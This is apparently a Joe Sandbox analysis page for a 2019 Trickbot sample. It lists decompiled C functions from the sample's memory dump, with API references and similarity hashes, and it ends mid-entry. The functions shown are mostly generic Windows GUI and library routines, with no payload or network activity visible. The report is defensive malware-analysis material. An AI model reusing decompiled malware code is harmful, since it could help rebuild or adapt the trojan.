Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Scroll$CtrlMessageSend
String ID:
API String ID: 1219558039-0
Opcode ID: fd45872da83502ac7f8d07f8c40266ad8097cdbb7f3251700dac79eb9b793975
Instruction ID: c1eba77a85b1963741d145194148ccc4b3183374c85a73932b5aad2aa483d95e
Opcode Fuzzy Hash: fd45872da83502ac7f8d07f8c40266ad8097cdbb7f3251700dac79eb9b793975
Instruction Fuzzy Hash: BE115E31200358FFDF119F55EC89EAA7BB5FB44701F10882AF951962A1C3B4ED51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00426CB4, Relevance: 6.1, APIs: 4, Instructions: 53
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00426CB4(void* __ecx, int _a4, long _a8, signed int _a12) {
				int _v8;
				int _t26;
				void* _t37;
				void* _t44;
				signed int _t47;

				_push(__ecx);
				_t47 = _a12;
				_t37 = __ecx;
				_t44 = (GetDlgCtrlID( *(_t47 + 0x1c)) & 0x0000ffff) - 0xea10;
				_t26 = GetScrollPos( *(_t47 + 0x1c), 2);
				_a12 = _a12 & 0x00000000;
				_v8 = _t26;
				if( *((intOrPtr*)(_t37 + 0x6c)) > 0) {
					_a4 = (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff;
					do {
						_a8 =  *(_t47 + 0x1c);
						SendMessageA( *(E00424B00(_t37, _t44, _a12) + 0x1c), 0x115, _a4, _a8);
						if(_a12 <  *((intOrPtr*)(_t37 + 0x6c)) - 1) {
							SetScrollPos( *(_t47 + 0x1c), 2, _v8, 0);
						}
						_a12 = _a12 + 1;
						_t26 = _a12;
					} while (_t26 <  *((intOrPtr*)(_t37 + 0x6c)));
				}
				return _t26;
			}

0x00426cb7
0x00426cba
0x00426cbe
0x00426cce
0x00426cd7
0x00426cdd
0x00426ce5
0x00426ce8
0x00426cf7
0x00426cfa
0x00426d02
0x00426d19
0x00426d26
0x00426d32
0x00426d32
0x00426d38
0x00426d3b
0x00426d3e
0x00426cfa
0x00426d47

APIs

GetDlgCtrlID.USER32(?), ref: 00426CC3
GetScrollPos.USER32(?,00000002), ref: 00426CD7
SendMessageA.USER32(?,00000115,?,?), ref: 00426D19
SetScrollPos.USER32(?,00000002,?,00000000), ref: 00426D32

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Scroll$CtrlMessageSend
String ID:
API String ID: 1219558039-0
Opcode ID: 6f5a605fe724b9b604ad3f0b4f84caa6a12a91c39a123ba14cc55f0d973fd5d8
Instruction ID: 5af3aef83dc0c919a6942dd2bd4520737546826c62a0ce3e496867c393cc44ba
Opcode Fuzzy Hash: 6f5a605fe724b9b604ad3f0b4f84caa6a12a91c39a123ba14cc55f0d973fd5d8
Instruction Fuzzy Hash: 8F114F31200218FFDF119F15EC45AAA7BB5FB44305F10842AFD02962A1D3B5DD61DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D093, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041D093(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t10;
				void* _t22;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;

				_t31 = __esi;
				_push(__ecx);
				_t22 = __ecx;
				if(E0041BDEB(0x10) == 0) {
					_t29 = 0;
				} else {
					_t29 = E0041D02C(_t8, 0xffffffff);
				}
				_push(_t31);
				_t10 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 4))(1);
					}
					E0041DA99(_t34, GetLastError(), 0);
				}
				 *((intOrPtr*)(_t29 + 4)) = _v8;
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
				return _t29;
			}

0x0041d093
0x0041d096
0x0041d099
0x0041d0a5
0x0041d0b4
0x0041d0a7
0x0041d0b0
0x0041d0b0
0x0041d0b6
0x0041d0c7
0x0041d0d9
0x0041d0dd
0x0041d0e5
0x0041d0e5
0x0041d0f1
0x0041d0f1
0x0041d0f9
0x0041d0ff
0x0041d107

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041D0C7
GetCurrentProcess.KERNEL32(?,00000000), ref: 0041D0CD
DuplicateHandle.KERNEL32(00000000), ref: 0041D0D0
GetLastError.KERNEL32(00000000), ref: 0041D0EA

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: e564f38fb1a09cf8282d13b77620846182e222f32d028b61ed53b63ccbc38c11
Instruction ID: 941c6dec626f15ba49ee508ca998af64c5d12853038e6dca728117834027dfe1
Opcode Fuzzy Hash: e564f38fb1a09cf8282d13b77620846182e222f32d028b61ed53b63ccbc38c11
Instruction Fuzzy Hash: 610184B5B04200BBEB109BA69C49F9B7B99DF88714F104526FA05CB2C1DAB4DC418768

Uniqueness

Uniqueness Score: -1.00%

Function 00410C30, Relevance: 6.1, APIs: 4, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410C30() {
				signed int _t18;
				intOrPtr _t20;
				void* _t24;
				long _t26;
				void* _t29;
				void* _t32;
				signed int _t34;
				void* _t35;
				void* _t36;
				void* _t40;
				void* _t41;
				void* _t42;

				_t34 = 0;
				_t26 = GetCurrentThreadId();
				EnterCriticalSection(0x44d320);
				_t36 =  *0x44d39c - _t34; // 0x0
				if(_t36 > 0) {
					do {
						_t18 = _t34 * 4;
						_t32 = _t18 + _t18 * 4;
						if( *((intOrPtr*)(_t18 + 0x44d3a4 + _t18 * 4)) == _t26) {
							_t20 =  *((intOrPtr*)(_t32 + 0x44d3ac)) - 1;
							 *((intOrPtr*)(_t32 + 0x44d3ac)) = _t20;
							if(_t20 == 0 ||  *(_t32 + 0x44d3a0) ==  *((intOrPtr*)(_t35 + 0x14))) {
								UnhookWindowsHookEx( *(_t32 + 0x44d3a8));
								 *0x44d39c =  *0x44d39c - 1;
								_t40 = _t34 -  *0x44d39c; // 0x0
								if(_t40 < 0) {
									_t29 = _t32 + 0x44d3a0;
									do {
										_t34 = _t34 + 1;
										_t24 = memcpy(_t29, _t29 + 0x14, 5 << 2);
										_t35 = _t35 + 0xc;
										_t29 = _t24;
										_t41 = _t34 -  *0x44d39c; // 0x0
									} while (_t41 < 0);
								}
							}
						}
						_t34 = _t34 + 1;
						_t42 = _t34 -  *0x44d39c; // 0x0
					} while (_t42 < 0);
				}
				 *0x44d344 =  *0x44d344 - 1;
				LeaveCriticalSection(0x44d320);
				if( *0x44d344 == 0) {
					E00411880();
				}
				return 1;
			}

0x00410c34
0x00410c3c
0x00410c43
0x00410c49
0x00410c4f
0x00410c51
0x00410c51
0x00410c5f
0x00410c62
0x00410c6a
0x00410c6b
0x00410c71
0x00410c86
0x00410c8c
0x00410c92
0x00410c98
0x00410c9a
0x00410ca0
0x00410caa
0x00410cab
0x00410cab
0x00410cad
0x00410caf
0x00410caf
0x00410ca0
0x00410c98
0x00410c71
0x00410cb7
0x00410cb8
0x00410cb8
0x00410c51
0x00410cc5
0x00410ccb
0x00410cd8
0x00410cda
0x00410cda
0x00410ce8

APIs

GetCurrentThreadId.KERNEL32 ref: 00410C36
EnterCriticalSection.KERNEL32(0044D320), ref: 00410C43
UnhookWindowsHookEx.USER32(?), ref: 00410C86
LeaveCriticalSection.KERNEL32(0044D320), ref: 00410CCB

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: d1bc0b61ea2c1d01f1e31649a6da78d39d16085671bc685b3b4963f93663c198
Instruction ID: 27bbcc0db2b04a587081c694851477f4ec1e7249ca7f439611acb1bcef95169b
Opcode Fuzzy Hash: d1bc0b61ea2c1d01f1e31649a6da78d39d16085671bc685b3b4963f93663c198
Instruction Fuzzy Hash: 35118835A006089FC720AF65E848AA673E5F741745F40427AED0983A20E7B9A8D0CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 00434034, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00434034(intOrPtr __ecx, void* __eflags) {
				void* _t21;
				intOrPtr* _t32;
				struct HICON__** _t40;
				intOrPtr _t43;
				void* _t45;

				E00405340(E00437B97, _t45);
				_push(__ecx);
				_t43 = __ecx;
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43b464;
				 *(_t45 - 4) = 1;
				E00420D92(__ecx + 0x78);
				_t39 =  *((intOrPtr*)(_t43 + 0x114));
				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
					E00435C26(_t39);
					E0041BE14(_t39);
				}
				E0041BE14( *((intOrPtr*)(_t43 + 0x88)));
				_t32 =  *((intOrPtr*)(_t43 + 0x74));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 4))(1);
				}
				_t40 = _t43 + 0x100;
				if( *(_t43 + 0x100) != 0) {
					SetCursor(LoadCursorA(0, 0x7f00));
					DestroyIcon( *_t40);
				}
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				E00420DC3(_t43 + 0x78);
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				_t21 = E0041FC3D(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t21;
			}

0x00434039
0x0043403e
0x00434040
0x00434043
0x00434046
0x0043404f
0x00434056
0x0043405b
0x00434063
0x00434067
0x0043406d
0x00434072
0x00434079
0x0043407f
0x00434084
0x0043408a
0x0043408a
0x00434094
0x0043409a
0x004340aa
0x004340b2
0x004340b2
0x004340b8
0x004340bf
0x004340c4
0x004340ca
0x004340d4
0x004340dc

APIs

__EH_prolog.LIBCMT ref: 00434039
LoadCursorA.USER32(00000000,00007F00), ref: 004340A3
SetCursor.USER32(00000000), ref: 004340AA
DestroyIcon.USER32(00000000), ref: 004340B2

Part of subcall function 00435C26: __EH_prolog.LIBCMT ref: 00435C2B
Part of subcall function 00435C26: DeleteDC.GDI32(?), ref: 00435C4C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CursorH_prolog$DeleteDestroyIconLoad
String ID:
API String ID: 2243588198-0
Opcode ID: bebf61450bcab6a44e03bb4c2e4a3240044722bae4c3a7e61e11c7e315cfdf03
Instruction ID: 71aadd75907d70aeb38ba6f5edb18f31eeb5f6baf2467b7eb72f6f0b625f90e3
Opcode Fuzzy Hash: bebf61450bcab6a44e03bb4c2e4a3240044722bae4c3a7e61e11c7e315cfdf03
Instruction Fuzzy Hash: 7511A031600B009BD729AF61D8057EEB7B5EF88708F10451EE166972A2CBB87945CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041626C, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041626C(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || E004225BE(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = E00422633(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}

0x00416271
0x00416278
0x0041627b
0x0041627e
0x0041627f
0x00416284
0x0041628a
0x0041628e
0x00416297
0x0041629b
0x004162b2
0x004162c4
0x004162c8
0x004162d7
0x004162d7
0x004162ca
0x004162cb
0x004162d3
0x004162d5
0x00000000
0x00000000
0x004162d5
0x004162a9
0x004162a9
0x004162a9
0x0041629b
0x004162dc

APIs

WindowFromPoint.USER32(?,?), ref: 00416284
GetParent.USER32(00000000), ref: 00416291
ScreenToClient.USER32(00000000,?), ref: 004162B2
IsWindowEnabled.USER32(00000000), ref: 004162CB

Part of subcall function 004225BE: GetWindowLongA.USER32(00000000,000000F0), ref: 004225CF

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: bada71ca1be7494428bf6668b06c46691f16795a6048c3d1de7744f9393f1ff4
Instruction ID: 9956ed594e0b1c4020f4c77fb1701725dfcbd7b7a70248eb3f350d8e028f1e27
Opcode Fuzzy Hash: bada71ca1be7494428bf6668b06c46691f16795a6048c3d1de7744f9393f1ff4
Instruction Fuzzy Hash: 8801F736B00510BF8B02AB98DC45DEFBBB9EF85710B15406AF905D3350DBB8CD419758

Uniqueness

Uniqueness Score: -1.00%

Function 0042B9AB, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042B9AB(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t23;
				void* _t25;
				CHAR* _t26;
				CHAR* _t29;
				void* _t31;
				CHAR* _t32;

				_t30 = __ecx;
				_t32 = _a4;
				_t31 = __ecx;
				if(( *(_t32 + 4) & 0x00000001) == 0) {
					_t29 = LockResource(LoadResource( *(_t32 + 8), FindResourceA( *(_t32 + 8),  *(_t32 + 0xc), 5)));
				} else {
					_t29 =  *(_t32 + 0xc);
				}
				_t23 = E00432562();
				_t34 =  *((intOrPtr*)(_t23 + 0x1038));
				if( *((intOrPtr*)(_t23 + 0x1038)) != 0) {
					_t30 = _t31;
					_t29 = E0042B97B(_t31, _t34, _t29);
				}
				_push(_a8);
				_push(_t29);
				_a4 = E0042B897(_t30, _t34);
				_t25 =  *(_t31 + 0x44);
				if(_t25 != 0) {
					GlobalFree(_t25);
					 *(_t31 + 0x44) =  *(_t31 + 0x44) & 0x00000000;
				}
				_t26 = _a4;
				if(_t26 != 0) {
					_t29 = _t26;
					 *(_t31 + 0x44) = _t26;
				}
				 *(_t32 + 4) =  *(_t32 + 4) | 0x00000001;
				 *(_t32 + 0xc) = _t29;
				return _t26;
			}

0x0042b9ab
0x0042b9b0
0x0042b9b4
0x0042b9ba
0x0042b9e0
0x0042b9bc
0x0042b9bc
0x0042b9bc
0x0042b9e2
0x0042b9e7
0x0042b9ee
0x0042b9f1
0x0042b9f8
0x0042b9f8
0x0042b9fa
0x0042b9fd
0x0042ba03
0x0042ba06
0x0042ba0b
0x0042ba0e
0x0042ba14
0x0042ba14
0x0042ba18
0x0042ba1d
0x0042ba1f
0x0042ba21
0x0042ba21
0x0042ba24
0x0042ba28
0x0042ba2f

APIs

FindResourceA.KERNEL32(?,?,00000005), ref: 0042B9C9
LoadResource.KERNEL32(?,00000000), ref: 0042B9D3
LockResource.KERNEL32(00000000), ref: 0042B9DA
GlobalFree.KERNEL32(?), ref: 0042BA0E

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: 5a0d6ba71830bb5beeed32f3f487fa126445082b49b0b5ca50987c9821e0ab17
Instruction ID: 05878b3ebc334d64615eceb7928b8c26583b3a31d0dfdff706a5405c087c1196
Opcode Fuzzy Hash: 5a0d6ba71830bb5beeed32f3f487fa126445082b49b0b5ca50987c9821e0ab17
Instruction Fuzzy Hash: 9C1161B1700711AFDB109F65EC88A57BBE8EF08355F04842AFA5AC7661C7B9EC40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00419F1B, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00419F1B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				void* _t15;
				struct HWND__* _t17;
				struct HWND__* _t18;
				void* _t19;

				_t15 = __ecx;
				_t17 = GetDlgItem(_a4, _a8);
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						if(_t18 == 0) {
							break;
						}
						_t12 = E00419F1B(_t15, _t18, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E0041884D(_t19);
						}
						_t12 = E00418874();
						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E00419F1B(_t15, _t17, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}

0x00419f1b
0x00419f32
0x00419f36
0x00419f66
0x00419f69
0x00419f6b
0x00419f6b
0x00419f6f
0x00000000
0x00000000
0x00419f78
0x00419f7f
0x00419f84
0x00000000
0x00419f84
0x00000000
0x00419f7f
0x00000000
0x00419f38
0x00419f3d
0x00419f4f
0x00419f53
0x00419f54
0x00000000
0x00419f56
0x00419f5d
0x00419f64
0x00000000
0x00000000
0x00419f3f
0x00419f46
0x00419f4d
0x00000000
0x00000000
0x00419f4d
0x00419f3d
0x00419f91
0x00419f91

APIs

GetDlgItem.USER32(?,?), ref: 00419F26
GetTopWindow.USER32(00000000), ref: 00419F39
GetTopWindow.USER32(?), ref: 00419F69
GetWindow.USER32(00000000,00000002), ref: 00419F84

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: d49a1e12f1cae09bdfa8bf8b8b90a343932daf75df872419a94f068ab9572529
Instruction ID: 6069717ea75e7622e51b553f174ac139a3fd3a854802f0833df533bb860cd4fd
Opcode Fuzzy Hash: d49a1e12f1cae09bdfa8bf8b8b90a343932daf75df872419a94f068ab9572529
Instruction Fuzzy Hash: ED018F32109219B7CF223F628C14ADF3A59AF40790B004126FD00D1210D739DD939A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00419F94, Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00419F94(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E00418874();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E0041868C(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E00419F94(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}

0x00419f94
0x00419fa2
0x00419fa4
0x00419fa4
0x00419fa8
0x00000000
0x00000000
0x00419fae
0x00419fd8
0x00419fb0
0x00419fb0
0x00419fb1
0x00419fb8
0x00419fba
0x00419fbd
0x00419fc0
0x00419fc3
0x00419fc6
0x00419fc7
0x00419fc7
0x00419fb8
0x00419fe2
0x00419ffb
0x00419ffb
0x0041a003
0x0041a003
0x0041a00e

APIs

GetTopWindow.USER32(?), ref: 00419FA2
SendMessageA.USER32(00000000,?,?,?), ref: 00419FD8
GetTopWindow.USER32(00000000), ref: 00419FE5
GetWindow.USER32(00000000,00000002), ref: 0041A003

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: c475cc81fc7d1e349bde436e6fe604cd2ca6a574a8379bccacff4b2d986ce10d
Instruction ID: e6ff25d428d1320b785f54a7a505f37ec6242be7acdd796a9879f08a03e9147c
Opcode Fuzzy Hash: c475cc81fc7d1e349bde436e6fe604cd2ca6a574a8379bccacff4b2d986ce10d
Instruction Fuzzy Hash: E1010C3200511ABBCF126F959D04EDF3B6AAF49354F044016FA1491121C73ADDB2EBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBD1, Relevance: 6.0, APIs: 4, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041BBD1(void* __ecx, void* __ebp, signed int _a4) {
				intOrPtr _t16;
				int _t17;
				void* _t20;
				struct HWND__* _t26;
				intOrPtr _t35;
				void* _t36;

				_t37 = __ebp;
				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t16 == 0) {
					if(_a4 == 0) {
						_t35 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t35 + 0x1c)) {
							_t20 = E0041884D(__ebp, GetParent( *(_t35 + 0x1c)));
							_t26 =  *(_t36 + 0x14);
							if(_t26 != 0) {
								_t26 =  *(_t26 + 0x1c);
							}
							E0041B83C(E0041884D(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
						}
					}
					_t17 = E0041B815( *(_t36 + 0x14), _a4);
					L9:
					 *((intOrPtr*)(_t36 + 0x18)) = 1;
					return _t17;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
					return _t16;
				}
				asm("sbb ecx, ecx");
				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
				goto L9;
			}

0x0041bbd1
0x0041bbd2
0x0041bbd4
0x0041bbd9
0x0041bc07
0x0041bc09
0x0041bc15
0x0041bc21
0x0041bc26
0x0041bc2b
0x0041bc2d
0x0041bc2d
0x0041bc44
0x0041bc44
0x0041bc15
0x0041bc50
0x0041bc56
0x0041bc56
0x00000000
0x0041bc56
0x0041bbdf
0x0041bc5e
0x0041bc5e
0x0041bbe7
0x0041bbf9
0x00000000

APIs

EnableMenuItem.USER32(?,?,?), ref: 0041BBF9
GetFocus.USER32 ref: 0041BC0C
GetParent.USER32(?), ref: 0041BC1A
GetNextDlgTabItem.USER32(?,?,00000000), ref: 0041BC36

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: 4057ab493c0c29e34a46ebec493171c5cab23eeaf33375c7132dab010e99f8b8
Instruction ID: 85d5e01dd189e90837de880ec3fb2f4dfc0d878d9ef6231601d8d897ad172b9c
Opcode Fuzzy Hash: 4057ab493c0c29e34a46ebec493171c5cab23eeaf33375c7132dab010e99f8b8
Instruction Fuzzy Hash: F8115271100600EFDB29AF61D859B97B7B5EF50711F10862EF152466A0DB79EC81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004363F0, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004363F0(intOrPtr* __ecx, int _a4) {
				struct HDC__* _t8;
				int _t16;
				void* _t18;
				void* _t21;
				intOrPtr* _t22;

				_t16 = _a4;
				_t22 = __ecx;
				_t21 = GetStockObject(_t16);
				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
					_t8 =  *(_t22 + 4);
					if(_t8 != 0) {
						SelectObject(_t8, _t21);
					}
					_push(SelectObject( *(_t22 + 8), _t21));
					return E00421789();
				} else {
					_push(SelectObject( *(_t22 + 8), _t21));
					_t18 = E00421789();
					if( *(_t22 + 0x2c) != _t21) {
						 *(_t22 + 0x2c) = _t21;
						E00436460(_t22);
					}
					return _t18;
				}
			}

0x004363f1
0x004363f7
0x00436403
0x00436405
0x0043643d
0x00436448
0x0043644c
0x0043644c
0x00436454
0x00000000
0x00436416
0x00436420
0x00436429
0x0043642b
0x00436433
0x00436436
0x00436436
0x00000000
0x0043642d

APIs

GetStockObject.GDI32(?), ref: 004363FA
SelectObject.GDI32(?,00000000), ref: 0043641A
SelectObject.GDI32(?,00000000), ref: 0043644C
SelectObject.GDI32(?,00000000), ref: 00436452

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
